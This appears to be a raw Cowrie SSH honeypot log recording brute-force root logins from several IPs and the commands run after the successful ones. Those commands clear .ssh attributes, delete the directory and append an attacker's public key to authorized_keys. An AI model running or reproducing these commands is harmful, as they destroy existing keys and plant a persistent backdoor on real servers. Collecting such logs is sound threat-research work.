{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:11:07.458811Z","src_ip":"152.32.190.168","session":"52670f023dc5"}
{"eventid":"cowrie.login.success","username":"root","password":"A1234567!","message":"login attempt [root/A1234567!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:11:08.322690Z","src_ip":"152.32.190.168","session":"52670f023dc5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:11:08.786557Z","src_ip":"152.32.190.168","session":"52670f023dc5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:11:08.787456Z","src_ip":"152.32.190.168","session":"52670f023dc5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:11:08.788405Z","src_ip":"152.32.190.168","session":"52670f023dc5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:11:08.995756Z","src_ip":"152.32.190.168","session":"52670f023dc5"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:11:09.302703Z","src_ip":"212.227.235.229","session":"6334f49f35c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:11:09.461238Z","src_ip":"152.32.190.168","session":"52670f023dc5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:11:09.461918Z","src_ip":"152.32.190.168","session":"52670f023dc5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:11:09.670061Z","src_ip":"152.32.190.168","session":"52670f023dc5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:11:09.670933Z","src_ip":"152.32.190.168","session":"52670f023dc5"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":43014,"dst_ip":"1.2.3.4","dst_port":22,"session":"1dbff27efe1c","protocol":"ssh","message":"New connection: 152.32.190.168:43014 (1.2.3.4:22) [session: 1dbff27efe1c]","sensor":"my-vps","timestamp":"2025-09-09T04:11:09.978148Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:11:09.979057Z","src_ip":"152.32.190.168","session":"1dbff27efe1c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:11:10.234576Z","src_ip":"152.32.190.168","session":"1dbff27efe1c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:11:11.297387Z","src_ip":"152.32.190.168","session":"1dbff27efe1c"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:11:12.555530Z","src_ip":"152.32.190.168","session":"1dbff27efe1c"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":43030,"dst_ip":"1.2.3.4","dst_port":22,"session":"424a2a459e21","protocol":"ssh","message":"New connection: 152.32.190.168:43030 (1.2.3.4:22) [session: 424a2a459e21]","sensor":"my-vps","timestamp":"2025-09-09T04:11:12.707965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:11:12.713025Z","src_ip":"152.32.190.168","session":"424a2a459e21"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:11:12.918283Z","src_ip":"152.32.190.168","session":"424a2a459e21"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57532,"dst_ip":"1.2.3.4","dst_port":22,"session":"560d2b64a6db","protocol":"ssh","message":"New connection: 212.227.235.229:57532 (1.2.3.4:22) [session: 560d2b64a6db]","sensor":"my-vps","timestamp":"2025-09-09T04:11:13.707712Z"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:11:13.741706Z","src_ip":"152.32.190.168","session":"424a2a459e21"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-09-09T04:11:13.934439Z","src_ip":"212.227.235.229","session":"560d2b64a6db"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:11:13.948767Z","src_ip":"152.32.190.168","session":"52670f023dc5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:11:13.949697Z","src_ip":"152.32.190.168","session":"424a2a459e21"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-09-09T04:11:14.884021Z","src_ip":"212.227.235.229","session":"560d2b64a6db"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":38174,"dst_ip":"1.2.3.4","dst_port":22,"session":"706acbe8741f","protocol":"ssh","message":"New connection: 211.22.25.164:38174 (1.2.3.4:22) [session: 706acbe8741f]","sensor":"my-vps","timestamp":"2025-09-09T04:11:17.100127Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:11:17.101517Z","src_ip":"211.22.25.164","session":"706acbe8741f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:11:17.342460Z","src_ip":"211.22.25.164","session":"706acbe8741f"}
{"eventid":"cowrie.login.success","username":"root","password":"andrew123","message":"login attempt [root/andrew123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:11:18.341050Z","src_ip":"211.22.25.164","session":"706acbe8741f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:11:20.562149Z","src_ip":"211.22.25.164","session":"706acbe8741f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:11:20.562884Z","src_ip":"211.22.25.164","session":"706acbe8741f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:11:20.564283Z","src_ip":"211.22.25.164","session":"706acbe8741f"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":41952,"dst_ip":"1.2.3.4","dst_port":22,"session":"7490762420fa","protocol":"ssh","message":"New connection: 103.59.95.12:41952 (1.2.3.4:22) [session: 7490762420fa]","sensor":"my-vps","timestamp":"2025-09-09T04:11:20.566218Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:11:20.567362Z","src_ip":"103.59.95.12","session":"7490762420fa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:11:20.807070Z","src_ip":"211.22.25.164","session":"706acbe8741f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:11:20.842933Z","src_ip":"103.59.95.12","session":"7490762420fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:11:21.347069Z","src_ip":"211.22.25.164","session":"706acbe8741f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:11:21.347760Z","src_ip":"211.22.25.164","session":"706acbe8741f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:11:21.589980Z","src_ip":"211.22.25.164","session":"706acbe8741f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:11:21.590856Z","src_ip":"211.22.25.164","session":"706acbe8741f"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":38180,"dst_ip":"1.2.3.4","dst_port":22,"session":"ecf047ea9d69","protocol":"ssh","message":"New connection: 211.22.25.164:38180 (1.2.3.4:22) [session: ecf047ea9d69]","sensor":"my-vps","timestamp":"2025-09-09T04:11:21.828679Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:11:21.829252Z","src_ip":"211.22.25.164","session":"ecf047ea9d69"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:11:21.916808Z","src_ip":"212.227.235.229","session":"560d2b64a6db"}
{"eventid":"cowrie.login.failed","username":"blank","password":"1234567890","message":"login attempt [blank/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-09T04:11:21.949218Z","src_ip":"103.59.95.12","session":"7490762420fa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:11:22.071281Z","src_ip":"211.22.25.164","session":"ecf047ea9d69"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:11:23.073202Z","src_ip":"211.22.25.164","session":"ecf047ea9d69"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:11:23.225650Z","src_ip":"103.59.95.12","session":"7490762420fa"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:11:24.315239Z","src_ip":"211.22.25.164","session":"ecf047ea9d69"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":38182,"dst_ip":"1.2.3.4","dst_port":22,"session":"bed568852a5a","protocol":"ssh","message":"New connection: 211.22.25.164:38182 (1.2.3.4:22) [session: bed568852a5a]","sensor":"my-vps","timestamp":"2025-09-09T04:11:24.554553Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:11:24.555729Z","src_ip":"211.22.25.164","session":"bed568852a5a"}
